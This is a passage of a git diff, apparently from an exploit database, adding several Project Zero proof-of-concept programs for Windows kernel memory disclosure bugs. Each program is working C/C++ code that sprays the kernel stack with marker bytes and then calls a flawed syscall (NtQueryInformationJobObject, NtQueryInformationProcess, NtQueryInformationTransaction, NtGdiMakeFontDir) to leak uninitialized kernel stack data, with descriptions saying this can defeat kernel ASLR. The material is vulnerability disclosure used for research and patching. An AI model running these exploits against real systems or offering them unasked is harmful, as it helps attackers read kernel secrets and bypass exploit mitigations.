printf("?? "); + } + } + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { + printf("%c", Data[i + j]); + } + else { + printf("."); + } + } + + printf("\n"); + } +} + +VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { + for (ULONG i = 0; i < size; i++) { + ptr[i] = byte; + } +} + +VOID SprayKernelStack() { + // Buffer allocated in static program memory, hence doesn't touch the local stack. + static BYTE buffer[4096]; + + // Fill the buffer with 'A's and spray the kernel stack. + MyMemset(buffer, 'A', sizeof(buffer)); + NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer); + + // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. + MyMemset(buffer, 'B', sizeof(buffer)); +} + +int main() { + // Windows 10 1607 32-bit. + CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9; + + // Create a job object to operate on. + HANDLE hJob = CreateJobObject(NULL, NULL); + + // Spray the kernel stack with a marker value, to get visible results. + SprayKernelStack(); + + // Trigger the bug in nt!NtQueryInformationJobObject(JobObjectBasicLimitInformation). + DWORD ReturnLength = 0; + BYTE output[120] = { /* zero padding */ }; + + NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectBasicLimitInformation, &output, sizeof(JOBOBJECT_BASIC_LIMIT_INFORMATION), &ReturnLength); + if (!NT_SUCCESS(st)) { + printf("NtQueryInformationJobObject#1 failed, %x\n", st); + CloseHandle(hJob); + return 1; + } + + // Print out the output. + printf("JobObjectBasicLimitInformation:\n"); + PrintHex(output, ReturnLength); + + // Spray the kernel again before invoking the affected system call. + SprayKernelStack(); + + // Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 112. + ZeroMemory(output, sizeof(output)); + + st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 112, &ReturnLength); + if (!NT_SUCCESS(st)) { + printf("NtQueryInformationJobObject#2 failed, %x\n", st); + CloseHandle(hJob); + return 1; + } + + // Print the output again. + printf("JobObjectExtendedLimitInformation (112):\n"); + PrintHex(output, ReturnLength); + + // Spray the kernel again before invoking the affected system call. + SprayKernelStack(); + + // Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 120. + ZeroMemory(output, sizeof(output)); + + st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 120, &ReturnLength); + if (!NT_SUCCESS(st)) { + printf("NtQueryInformationJobObject#2 failed, %x\n", st); + CloseHandle(hJob); + return 1; + } + + // Print the output again. + printf("JobObjectExtendedLimitInformation (120):\n"); + PrintHex(output, ReturnLength); + + // Free resources. + CloseHandle(hJob); + + return 0; +} diff --git a/platforms/windows/dos/42229.cpp b/platforms/windows/dos/42229.cpp new file mode 100755 index 000000000..a706db4a8 --- /dev/null +++ b/platforms/windows/dos/42229.cpp @@ -0,0 +1,148 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1190&desc=2 + +We have discovered that the nt!NtQueryInformationProcess system call called with the ProcessVmCounters information class discloses portions of uninitialized kernel stack memory to user-mode clients, due to output structure alignment holes. + +On our test Windows 10 32-bit workstation, an example layout of the output buffer is as follows: + +--- cut --- +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000030: 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 ................ +--- cut --- + +Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data can be returned in a VM_COUNTERS_EX2 structure: + +--- cut --- +typedef struct _VM_COUNTERS_EX { + SIZE_T PeakVirtualSize; + SIZE_T VirtualSize; + ULONG PageFaultCount; + SIZE_T PeakWorkingSetSize; + SIZE_T WorkingSetSize; + SIZE_T QuotaPeakPagedPoolUsage; + SIZE_T QuotaPagedPoolUsage; + SIZE_T QuotaPeakNonPagedPoolUsage; + SIZE_T QuotaNonPagedPoolUsage; + SIZE_T PagefileUsage; + SIZE_T PeakPagefileUsage; + SIZE_T PrivateUsage; +} VM_COUNTERS_EX; + +typedef struct _VM_COUNTERS_EX2 { + VM_COUNTERS_EX CountersEx; + SIZE_T PrivateWorkingSetSize; + ULONGLONG SharedCommitUsage; +} VM_COUNTERS_EX2, *PVM_COUNTERS_EX2; +--- cut --- + +If we map the above shadow bytes to the structure definition, it turns out that the uninitialized bytes correspond to the alignment hole between the PrivateWorkingSetSize and SharedCommitUsage fields. The PrivateWorkingSetSize field ends at offset 0x34 of the structure, while SharedCommitUsage must be 8-byte aligned, causing a gap to be introduced at offsets 0x34-0x37, which is not initialized by the kernel prior to being copied back to the client application. + +The attached proof of concept code works by first filling a large portion of the kernel stack with a controlled marker byte 0x41 ('A') using the nt!NtMapUserPhysicalPages system call, and then invokes the affected nt!NtQueryInformationProcess syscall. As a result, we can observe that these leftover bytes are indeed leaked to user-mode at offset 0x34 of the output structure: + +--- cut --- +00000000: 00 50 a8 00 00 50 a8 00 9b 01 00 00 00 00 19 00 .P...P.......... +00000010: 00 00 19 00 48 45 00 00 98 44 00 00 30 0a 00 00 ....HE...D..0... +00000020: 00 05 00 00 00 d0 05 00 00 c0 06 00 00 d0 05 00 ................ +00000030: 00 30 02 00[41 41 41 41]00 30 05 00 00 00 00 00 .0..AAAA.0...... +--- cut --- + +Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. +*/ + +#include +#include +#include + +#define ProcessVmCounters ((PROCESSINFOCLASS)3) + +typedef struct _VM_COUNTERS_EX { + SIZE_T PeakVirtualSize; + SIZE_T VirtualSize; + ULONG PageFaultCount; + SIZE_T PeakWorkingSetSize; + SIZE_T WorkingSetSize; + SIZE_T QuotaPeakPagedPoolUsage; + SIZE_T QuotaPagedPoolUsage; + SIZE_T QuotaPeakNonPagedPoolUsage; + SIZE_T QuotaNonPagedPoolUsage; + SIZE_T PagefileUsage; + SIZE_T PeakPagefileUsage; + SIZE_T PrivateUsage; +} VM_COUNTERS_EX; + +typedef struct _VM_COUNTERS_EX2 { + VM_COUNTERS_EX CountersEx; + SIZE_T PrivateWorkingSetSize; + ULONGLONG SharedCommitUsage; +} VM_COUNTERS_EX2, *PVM_COUNTERS_EX2; + +extern "C" +ULONG WINAPI NtMapUserPhysicalPages( + PVOID BaseAddress, + ULONG NumberOfPages, + PULONG PageFrameNumbers +); + +VOID PrintHex(PBYTE Data, ULONG dwBytes) { + for (ULONG i = 0; i < dwBytes; i += 16) { + printf("%.8x: ", i); + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes) { + printf("%.2x ", Data[i + j]); + } + else { + printf("?? "); + } + } + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { + printf("%c", Data[i + j]); + } + else { + printf("."); + } + } + + printf("\n"); + } +} + +VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { + for (ULONG i = 0; i < size; i++) { + ptr[i] = byte; + } +} + +VOID SprayKernelStack() { + // Buffer allocated in static program memory, hence doesn't touch the local stack. + static BYTE buffer[4096]; + + // Fill the buffer with 'A's and spray the kernel stack. + MyMemset(buffer, 'A', sizeof(buffer)); + NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer); + + // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. + MyMemset(buffer, 'B', sizeof(buffer)); +} + +int main() { + VM_COUNTERS_EX2 counters; + ZeroMemory(&counters, sizeof(counters)); + + SprayKernelStack(); + + DWORD ReturnLength; + NTSTATUS st = NtQueryInformationProcess(GetCurrentProcess(), ProcessVmCounters, &counters, sizeof(counters), &ReturnLength); + if (!NT_SUCCESS(st)) { + printf("NtQueryInformationProcess failed, %x\n", st); + return 1; + } + + PrintHex((PBYTE)&counters, ReturnLength); + + return 0; +} diff --git a/platforms/windows/dos/42230.txt b/platforms/windows/dos/42230.txt new file mode 100755 index 000000000..93abc2276 --- /dev/null +++ b/platforms/windows/dos/42230.txt @@ -0,0 +1,32 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1191 + +We have discovered that the win32k!NtGdiMakeFontDir system call discloses large portions of uninitialized kernel stack memory to user-mode clients. + +The attached proof of concept code (which is specific to Windows 7 32-bit) works by first filling a large portion of the kernel stack with a controlled marker byte 0x41 ('A') using the nt!NtMapUserPhysicalPages system call, and then invoking the affected win32k!NtGdiMakeFontDir syscall. As a result, we can observe that a number of leftover bytes from the stack are indeed leaked to user-mode via the output structure: + +--- cut --- +00000000: 01 00 00 00 00 02 95 00 00 00 57 69 6e 64 6f 77 ..........Window +00000010: 73 21 20 57 69 6e 64 6f 77 73 21 20 57 69 6e 64 s! Windows! Wind +00000020: 6f 77 73 21 00 10 03 01 01 00 00 00 00 00 00 00 ows!............ +00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000040: 00 00 00 00 00 00 03 40 00 08 48 00 48 00 66 06 .......@..H.H.f. +00000050: 00 00 1b 02 00 00 00 f4 01 00 00 00 00 08 07 e8 ................ +00000060: 03 86 02 1f a8 01 02 00 00 00 00 00 00 76 00 00 .............v.. +00000070: 00 08 00 00 00 41 77 69 6e 65 5f 74 65 73 74 00 .....Awine_test. +00000080: 77 69 6e 65 5f 74 65 73 74 00 4d 65 64 69 75 6d wine_test.Medium +00000090: 00 41 41 41 41 00 41 41 41 41 41 41 41 41 41 41 .AAAA.AAAAAAAAAA +000000a0: 41 41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 AAAAAAAAA.AAAAAA +000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 AAAAAAAAAAAAAAA. +000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +000000f0: 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? AAAAAAAAAAA..... +--- cut --- + +In order for the PoC program to work, the attached wine_test.ttf font must be present in the current working directory. + +Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42230.zip diff --git a/platforms/windows/dos/42231.cpp b/platforms/windows/dos/42231.cpp new file mode 100755 index 000000000..0fc98b353 --- /dev/null +++ b/platforms/windows/dos/42231.cpp @@ -0,0 +1,136 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1193 + +We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the 12 information class discloses portions of uninitialized kernel stack memory to user-mode clients. + +The specific name of the 12 information class or the layout of the corresponding output buffer are unknown to us; however, we have determined that on Windows 10 1607 32-bit, output sizes of 48 and 56 bytes are accepted. In both cases, 4 uninitialized kernel stack bytes are leaked at the end of the structure (at offsets of 0x2C or 0x34, respectively). + +The attached proof-of-concept program demonstrates both disclosures by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call with infoclass=12 and the allowed output sizes. An example output is as follows: + +--- cut --- +Class 12, output length 48: +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000020: 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA +Class 12, output length 56: +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000030: 00 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........ +--- cut --- + +It is clearly visible here that in both responses, 4 bytes copied from ring-0 to ring-3 remained uninitialized. + +Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. +*/ + +#include +#include +#include + +extern "C" +ULONG WINAPI NtMapUserPhysicalPages( + PVOID BaseAddress, + ULONG NumberOfPages, + PULONG PageFrameNumbers +); + +// For native 32-bit execution. +extern "C" +ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { + __asm{mov eax, ApiNumber}; + __asm{lea edx, ApiNumber + 4}; + __asm{int 0x2e}; +} + +VOID PrintHex(PBYTE Data, ULONG dwBytes) { + for (ULONG i = 0; i < dwBytes; i += 16) { + printf("%.8x: ", i); + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes) { + printf("%.2x ", Data[i + j]); + } + else { + printf("?? "); + } + } + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { + printf("%c", Data[i + j]); + } + else { + printf("."); + } + } + + printf("\n"); + } +} + +VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { + for (ULONG i = 0; i < size; i++) { + ptr[i] = byte; + } +} + +VOID SprayKernelStack() { + // Buffer allocated in static program memory, hence doesn't touch the local stack. + static BYTE buffer[4096]; + + // Fill the buffer with 'A's and spray the kernel stack. + MyMemset(buffer, 'A', sizeof(buffer)); + NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer); + + // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. + MyMemset(buffer, 'B', sizeof(buffer)); +} + +int main() { + // Windows 10 1607 32-bit. + CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9; + + // Create a job object to operate on. + HANDLE hJob = CreateJobObject(NULL, NULL); + + // Spray the kernel stack with a marker value, to get visible results. + SprayKernelStack(); + + // Trigger the bug in nt!NtQueryInformationJobObject(class 12, output length 48). + DWORD ReturnLength = 0; + BYTE output[56] = { /* zero padding */ }; + + NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, 12, output, 48, &ReturnLength); + if (!NT_SUCCESS(st)) { + printf("NtQueryInformationJobObject#1 failed, %x\n", st); + CloseHandle(hJob); + return 1; + } + + // Print out the output. + printf("Class 12, output length 48:\n"); + PrintHex(output, ReturnLength); + + // Spray the kernel again before invoking the affected system call. + SprayKernelStack(); + + // Trigger the bug in nt!NtQueryInformationJobObject(class 12, output length 56). + ZeroMemory(output, sizeof(output)); + + st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, 12, output, 56, &ReturnLength); + if (!NT_SUCCESS(st)) { + printf("NtQueryInformationJobObject#2 failed, %x\n", st); + CloseHandle(hJob); + return 1; + } + + // Print the output again. + printf("Class 12, output length 56:\n"); + PrintHex(output, ReturnLength); + + // Free resources. + CloseHandle(hJob); + + return 0; +} diff --git a/platforms/windows/dos/42232.cpp b/platforms/windows/dos/42232.cpp new file mode 100755 index 000000000..ad99de73e --- /dev/null +++ b/platforms/windows/dos/42232.cpp @@ -0,0 +1,112 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1194 + +We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the 28 information class discloses portions of uninitialized kernel stack memory to user-mode clients. + +The specific name of the 28 information class or the layout of the corresponding output buffer are unknown to us; however, we have determined that on Windows 10 1607 32-bit, an output size of 40 bytes is accepted. At the end of that memory area, 16 uninitialized bytes from the kernel stack are leaked to the client application. + +The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call with infoclass=28 and the allowed output size. An example output is as follows: + +--- cut --- +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41 ........AAAAAAAA +00000020: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........ +--- cut --- + +It is clearly visible here that 16 bytes copied from ring-0 to ring-3 remained uninitialized. If the stack spraying function call is commented out, raw kernel pointers can be observed in the output. + +Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. +*/ + +#include +#include +#include + +extern "C" +ULONG WINAPI NtMapUserPhysicalPages( + PVOID BaseAddress, + ULONG NumberOfPages, + PULONG PageFrameNumbers +); + +// For native 32-bit execution. +extern "C" +ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { + __asm{mov eax, ApiNumber}; + __asm{lea edx, ApiNumber + 4}; + __asm{int 0x2e}; +} + +VOID PrintHex(PBYTE Data, ULONG dwBytes) { + for (ULONG i = 0; i < dwBytes; i += 16) { + printf("%.8x: ", i); + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes) { + printf("%.2x ", Data[i + j]); + } + else { + printf("?? "); + } + } + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { + printf("%c", Data[i + j]); + } + else { + printf("."); + } + } + + printf("\n"); + } +} + +VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { + for (ULONG i = 0; i < size; i++) { + ptr[i] = byte; + } +} + +VOID SprayKernelStack() { + // Buffer allocated in static program memory, hence doesn't touch the local stack. + static BYTE buffer[4096]; + + // Fill the buffer with 'A's and spray the kernel stack. + MyMemset(buffer, 'A', sizeof(buffer)); + NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer); + + // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. + MyMemset(buffer, 'B', sizeof(buffer)); +} + +int main() { + // Windows 10 1607 32-bit. + CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9; + + // Create a job object to operate on. + HANDLE hJob = CreateJobObject(NULL, NULL); + + // Spray the kernel stack with a marker value, to get visible results. + SprayKernelStack(); + + // Trigger the bug in nt!NtQueryInformationJobObject(class 28, output length 40). + DWORD ReturnLength = 0; + BYTE output[40] = { /* zero padding */ }; + + NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, 28, output, sizeof(output), &ReturnLength); + if (!NT_SUCCESS(st)) { + printf("NtQueryInformationJobObject failed, %x\n", st); + CloseHandle(hJob); + return 1; + } + + // Print out the output. + PrintHex(output, ReturnLength); + + // Free resources. + CloseHandle(hJob); + + return 0; +} diff --git a/platforms/windows/dos/42233.cpp b/platforms/windows/dos/42233.cpp new file mode 100755 index 000000000..c3b59b62c --- /dev/null +++ b/platforms/windows/dos/42233.cpp @@ -0,0 +1,109 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1196 + +We have discovered that the nt!NtQueryInformationTransaction system call called with the 1 information class discloses portions of uninitialized kernel stack memory to user-mode clients, on Windows 7 to Windows 10. + +The specific name of the 1 information class or the layout of the corresponding output buffer are unknown to us; however, we have determined that on 32-bit Windows platforms, an output size of 32 bytes and more is accepted. At the end of that memory area, 6 uninitialized bytes from the kernel stack can be leaked to the client application. + +The attached proof-of-concept program (specific to Windows 10 1607 32-bit) demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call with infoclass=1 and the allowed output size. An example output is as follows: + +--- cut --- +00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +00000010: 01 00 00 00 00 00 00 00 00 00 41 41 41 41 41 41 ..........AAAAAA +--- cut --- + +It is clearly visible here that 6 bytes copied from ring-0 to ring-3 remained uninitialized. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. +*/ + +#include +#include +#include +#include + +extern "C" +ULONG WINAPI NtMapUserPhysicalPages( + PVOID BaseAddress, + ULONG NumberOfPages, + PULONG PageFrameNumbers +); + +// For native 32-bit execution. +extern "C" +ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { + __asm{mov eax, ApiNumber}; + __asm{lea edx, ApiNumber + 4}; + __asm{int 0x2e}; +} + +VOID PrintHex(PBYTE Data, ULONG dwBytes) { + for (ULONG i = 0; i < dwBytes; i += 16) { + printf("%.8x: ", i); + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes) { + printf("%.2x ", Data[i + j]); + } + else { + printf("?? "); + } + } + + for (ULONG j = 0; j < 16; j++) { + if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { + printf("%c", Data[i + j]); + } + else { + printf("."); + } + } + + printf("\n"); + } +} + +VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { + for (ULONG i = 0; i < size; i++) { + ptr[i] = byte; + } +} + +VOID SprayKernelStack() { + // Buffer allocated in static program memory, hence doesn't touch the local stack. + static BYTE buffer[4096]; + + // Fill the buffer with 'A's and spray the kernel stack. + MyMemset(buffer, 'A', sizeof(buffer)); + NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer); + + // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. + MyMemset(buffer, 'B', sizeof(buffer)); +} + +int main() { + // Windows 10 1607 32-bit. + CONST ULONG __NR_NtQueryInformationTransaction = 0x00b3; + + // Create an empty transaction. + HANDLE hTransaction = CreateTransaction(NULL, NULL, 0, 0, 0, 0, NULL); + + // Spray the kernel stack to get visible results. + SprayKernelStack(); + + // Trigger the vulnerability and print out the output structure. + BYTE output[32] = { /* zero padding */ }; + DWORD ReturnLength; + NTSTATUS st = SystemCall32(__NR_NtQueryInformationTransaction, hTransaction, 1, output, sizeof(output), &ReturnLength); + + if (!NT_SUCCESS(st)) { + printf("NtQueryInformationTransaction failed, %x\n", st); + CloseHandle(hTransaction); + return 1; + } + + PrintHex(output, ReturnLength); + + // Free resources. + CloseHandle(hTransaction); + + return 0; +}